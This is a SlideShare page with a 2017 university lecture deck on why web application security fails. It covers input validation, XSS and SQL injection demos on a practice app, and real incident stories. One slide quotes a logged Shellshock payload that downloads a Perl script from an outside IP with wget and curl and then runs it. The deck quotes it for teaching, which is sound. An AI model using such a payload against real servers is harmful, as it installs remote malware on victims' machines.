SlideShare a Scribd company logo

Webapp security-tut-2017

L
lokori

This document discusses common ways that web application security fails and provides examples. It begins with an agenda that covers how to build secure software, examples of real security failures, and a demonstration of security testing. The document then discusses best practices for secure design and implementation, including input validation, as well as examples of real-world attacks like SQL injection, XSS, and logic attacks. It concludes by providing further online resources for topics like the OWASP Top 10 vulnerabilities and security scanning tools.

Technology
1 of 37
Download to read offline
HOW AND WHY WEB APP SECURITY FAILS? 16.2. 2017 Tampere University of Technology Antti.virtanen@solita.fi Twitter: @Anakondantti
FOREWORD, 1 MINUTE › Solita? › Me? › Web application? • Much more important than you may realize..
AGENDA › How to make secure software? › … But, everything is broken! › … Because ... • Same mistakes are repeated. • Unthinkable, Unpossible, Impossiblator happens › Practical web application security testing. › Bonus: 10. fail 20. goto 10
SECURITY IS RISK MANAGEMENT
”“If you know the enemy and know yourself, you need not fear the result of a hundred battles. ” Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie Source: NSA recruitment video. Source: securityintelligence.com Source: Lizard Squad hacking group logo
SOLITA #DEVSEC LANDSCAPE
GOOD NEWS: SECURITY IS SIMPLE! Bad news: Simple != easy
RECIPE FOR SECURE SOFTWARE 1. Design it properly. Do the right thing. 2. Do it right 1. Mistake in implementation = bug = security issue 3. Prepare for the unthinkable (Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING 1. Don’t roll your own. 1. Especially, don’t invent hash algorithms, RND or crypto! 2. Seriously. Failure imminent and certain. 2. Follow best practices. 3. Understand what you are doing. 1. Read the RFC. Understand your tools and libs.
SOMETHING UNTHINKABLE It’s the same story every day..
UNTHINKABLE NAMES?
UNTHINKABLE DOMAINS AND DNS RECORDS (PUNY CODE ATTACK)
A PICTURE IS WORTH 1000 WORDS › Demo-time: SVG is a picture file, right? › Feeling lucky, punk?
WHAT THE ACTUAL **** ??
INPUT SANITATION = 80% WIN
THE SAME STORY ALL OVER! › XSS, CSRF, SQL injection, XXE.. • Are all about input validation. › Solution: white list allowed, deny everythingelse. › There’s still 20% left • You can fail session management certainly, but.. • Follow the advice: Don’t invent your own and you’ll be pretty safe.
JAVASCRIPT NECESSARY (?) EVIL
JAVASCRIPT IS FULL OF EVIL (GREPPING “EVIL” FROM JS SOURCES)
The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,. Arnold“Iceman” Schwarzenegger, movie Pwningiron.
DEMO/PRACTICE AGAINST GRUYERE http://google-gruyere.appspot.com/
LET’S XSS ! › Reflected vs. Stored › <script> doesn’t work? • No problem, JS is everywhere.. › Can’t XMLHttpRequest? • No prob, counter and fake
SQL INJECTION › GRUYERE does not contain SQL injection.. › But .. It’s a good example of an injection › SQL = Structured Query Language • However, “query” is a bit of a misnomer.. What is this???
INPUT SANITATION, STILL FAILING
LOGIC ATTACKS ARE DIFFICULT › Real example..
REAL WORLD ATTACK
FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED) › 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print- wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid: Google tip:Shellshock
WHAT THE ATTACKER WANTED? efixx– first lines.. core – first lines..
DEV OR OPS? OR #DEVSEC ? › Who is responsible for that server? › Do you need to care as a developer? › Ultimately: What is the developer’s responsibility?
SOME FAILS 2016-­2017 Stories from the trenches
FAIL 1: THE BURDEN OF LEGACY MD5 & C++ -­ “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE” › Native code is dangerous.. • ASLR & DEP make buffer overflows more difficult to exploit, but it still happens. › The lifespan of software can be surprisingly long.. • How to update and re-evaluate working software if nothing happens? • Home-exercise: Sell this to team & customer. Involves risk and cost. › New threats have emerged. • What parts are affected?
Screeshot removed.. FAIL 2: SHORTCUTS AND ANARCHY › Root cause: Heavy process, not understood / accepted by devs • making developers miserable.. › The devs are innovative people.. http//unauthorized.. V 1.3 coolserver AwesomeSoftware_Upgrade.exe
FAIL 3: “I ACCIDENTALLY”
STORY 4: THE WEBHACK EVENT › http://webhack.fi was a light-weight fun bug bounty hunt.. • The targets are not publicly accessible, but were production systems we created for our customers. › Hackers hacked.. › .. SQL injection -> dumped the whole database › .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT INTO.. › One issue turned out to be a 0-day in Spring libraries.. › Hnggh.. › The moral of the story is two-fold: 1. even if you do everything right, you can still fail 2. it’s not always so easy in real life.. › The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL • Fromthe internet: • OWASP Top10 • https://www.owasp.o rg/index.php/Categor y:OWASP_Top_Ten_ Project • OWASP ZAP proxy • https://www.owasp.o rg/index.php/OWAS P_Zed_Attack_Proxy _Project • KaliLinux • https://www.kali.org /
Webapp security-tut-2017

Recommended

Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
ClubHack
 
Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013
Nick Galbreath
 
Performance - a challenging craft
Performance - a challenging craftPerformance - a challenging craft
Performance - a challenging craft
Fabian Lange
 
Easy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comEasy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.com
adelardbrown2
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software development
Nick Galbreath
 
Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Let's pwn a chinese web browser!
Let's pwn a chinese web browser!
Juho Nurminen
 
Failure the-good-parts
Failure the-good-partsFailure the-good-parts
Failure the-good-parts
legendofklang
 
Good rules for bad apps
Good rules for bad appsGood rules for bad apps
Good rules for bad apps
Shem Magnezi
 

Recommended

Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
ClubHack
 
Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013
Nick Galbreath
 
Performance - a challenging craft
Performance - a challenging craftPerformance - a challenging craft
Performance - a challenging craft
Fabian Lange
 
Easy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comEasy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.com
adelardbrown2
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software development
Nick Galbreath
 
Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Let's pwn a chinese web browser!
Let's pwn a chinese web browser!
Juho Nurminen
 
Failure the-good-parts
Failure the-good-partsFailure the-good-parts
Failure the-good-parts
legendofklang
 
Good rules for bad apps
Good rules for bad appsGood rules for bad apps
Good rules for bad apps
Shem Magnezi
 
A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Process
daveruse
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them
Rosie Sherry
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOps
Dave Cliffe
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.com
adelardbrown2
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Jeff Sonstein
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on Marketing
Affiliate Summit
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Michele Butcher-Jones
 
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Nick Galbreath
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOps
lokori
 
Real world software launch
Real world software launchReal world software launch
Real world software launch
Kunal Johar
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development
PROIDEA
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Yevgeniy Brikman
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
John Allspaw
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
Steve Poole
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web Development
Johannes Brodwall
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)
Wooga
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Jinju Jang
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?
Andrii Dzynia
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
n|u - The Open Security Community
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Positive Hack Days
 
Phd final
Phd finalPhd final
Phd final
Positive Hack Days
 

More Related Content

What's hot

A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Process
daveruse
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them
Rosie Sherry
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOps
Dave Cliffe
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.com
adelardbrown2
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Jeff Sonstein
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on Marketing
Affiliate Summit
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Michele Butcher-Jones
 

What's hot (8)

A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Process
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOps
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.com
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on Marketing
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
 

Similar to Webapp security-tut-2017

Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Nick Galbreath
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOps
lokori
 
Real world software launch
Real world software launchReal world software launch
Real world software launch
Kunal Johar
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development
PROIDEA
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Yevgeniy Brikman
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
John Allspaw
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
Steve Poole
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web Development
Johannes Brodwall
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)
Wooga
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Jinju Jang
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?
Andrii Dzynia
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
n|u - The Open Security Community
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Positive Hack Days
 
Phd final
Phd finalPhd final
Phd final
Positive Hack Days
 
From dev to ops and beyond - getting it done
From dev to ops and beyond - getting it doneFrom dev to ops and beyond - getting it done
From dev to ops and beyond - getting it done
Edorian
 
Software Debugging for High-altitude Balloons
Software Debugging for High-altitude BalloonsSoftware Debugging for High-altitude Balloons
Software Debugging for High-altitude Balloons
jgrahamc
 
TDD Updated
TDD UpdatedTDD Updated
TDD Updated
Harshit Jain
 
Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!
harshit040591
 
Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1
Fabrizio Cilli
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
Zoltan Balazs
 

Similar to Webapp security-tut-2017 (20)

Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOps
 
Real world software launch
Real world software launchReal world software launch
Real world software launch
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web Development
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
Phd final
Phd finalPhd final
Phd final
 
From dev to ops and beyond - getting it done
From dev to ops and beyond - getting it doneFrom dev to ops and beyond - getting it done
From dev to ops and beyond - getting it done
 
Software Debugging for High-altitude Balloons
Software Debugging for High-altitude BalloonsSoftware Debugging for High-altitude Balloons
Software Debugging for High-altitude Balloons
 
TDD Updated
TDD UpdatedTDD Updated
TDD Updated
 
Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!
 
Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 

More from lokori

Smart Locks - too clever by half
Smart Locks - too clever by halfSmart Locks - too clever by half
Smart Locks - too clever by half
lokori
 
Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019
lokori
 
Developer is an attack vector
Developer is an attack vectorDeveloper is an attack vector
Developer is an attack vector
lokori
 
DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!
lokori
 
TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017
lokori
 
Tga2015 documentationpipeline
Tga2015 documentationpipelineTga2015 documentationpipeline
Tga2015 documentationpipeline
lokori
 
Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014
lokori
 
Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014
lokori
 
Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013
lokori
 

More from lokori (9)

Smart Locks - too clever by half
Smart Locks - too clever by halfSmart Locks - too clever by half
Smart Locks - too clever by half
 
Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019
 
Developer is an attack vector
Developer is an attack vectorDeveloper is an attack vector
Developer is an attack vector
 
DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!
 
TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017
 
Tga2015 documentationpipeline
Tga2015 documentationpipelineTga2015 documentationpipeline
Tga2015 documentationpipeline
 
Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014
 
Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014
 
Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013
 

Recently uploaded

Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Vladimir Iglovikov, Ph.D.
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 

Recently uploaded (20)

Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
